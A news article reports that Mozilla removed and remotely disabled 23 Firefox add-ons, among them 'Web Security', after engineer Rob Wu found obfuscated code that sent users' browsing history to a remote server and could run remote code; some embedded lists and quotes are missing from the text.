Mozilla removed today 23 Firefox add-ons that snooped on users and sent data to remote servers, a Mozilla engineer has told Bleeping Computer today.
The list of blocked add-ons includes "Web Security," a security-centric Firefox add-on with over 220,000 users, which was at the center of a controversy this week after it was caught sending users' browsing histories to a server located in Germany.
"The mentioned add-on has been taken down, together with others after I conducted a thorough audit of [the] add-ons," Rob Wu, a Mozilla Browser Engineer and Add-on review, told Bleeping Computer via email.
"These add-ons are no longer available at AMO and [have been] disabled in the browsers of users who installed them," Wu said.
"I did the investigation voluntarily last weekend after spotting Raymond Hill's (gorhill) comment on Reddit," Wu told us. "I audited the source code of the extension, using tools including my extension source viewer."
"After getting a good view of the extension's functionality, I used webextaware to retrieve all publicly available Firefox add-ons from addons.mozilla.org (AMO) and looked for similar patterns. Through this method, I found twenty add-ons that I subjected to an additional review, which can be put in two evenly sized groups based on their characteristics.
"The first group is similar to the Web Security add-on. At installation time, a request is sent to a remote server to fetch the URL of another server. Whenever a user navigates to a different location, the URL of the tab is sent to this remote server. This is not just a fire-and-forget request; responses in a specific format can activate remote code execution (RCE) functionality," Wu said. "Fortunately, the extension authors made an implementation mistake in 7 out of 10 extensions (including Web Security), which prevents RCE from working."
"The second group does not collect tab URLs in the same way as the first group, but it is able to execute remote code (which has a worse effect), This second group seems like an evolved version of the first group, because the same logic was used for RCE, with more obfuscation than the other group.
"All of these extensions used subtle code obfuscation, where actual legitimate extension functionality is mixed with seemingly innocent code, spread over multiple locations and files. The sheer number of misleading identifiers, obfuscated URLs / constants, and covert data flows left me with little doubt about the intentions of the author: It is apparent that they tried to hide malicious code in their add-on."
Wu reported these issues to fellow Mozilla engineers, who not only removed the add-ons from the Mozilla website, but also disabled them inside users' browsers.
"Although I could have taken down the extensions myself (as a add-on reviewer at AMO), I did not do so, because just taking down the listings would prevent new installations, but still leave a few hundred thousand users vulnerable to an extension from a shady developer," Wu told Bleeping Computer via email.
A bug report includes the list of all add-ons removed today in Mozilla's purge. The bug report lists the add-ons by their IDs, and not by their names, although Wu provided Bleeping Computer with the names of some add-ons.
Besides Web Security, other banned add-ons include Browser Security, Browser Privacy, and Browser Safety. All of these have been observed sending data to the same server as Web Security, located at 220.127.116.11.
The other banned add-ons include:
All in all, over 500,000 users had one of these add-ons installed inside Firefox.
After a quick test, true to its word, Mozilla has indeed disabled the Web Security add-on in a Firefox instance Bleeping Computer used yesterday for tests. Users of any of the banned add-ons will see a warning like this:
The warning message displayed at the top redirects users to this page, where it provides the following explanation for the ban:
In the bug report, another Mozilla engineer gave additional explanations, consistent with Wu's investigation:
Article updated with the names of other banned add-ons and additional investigation details provided by Wu.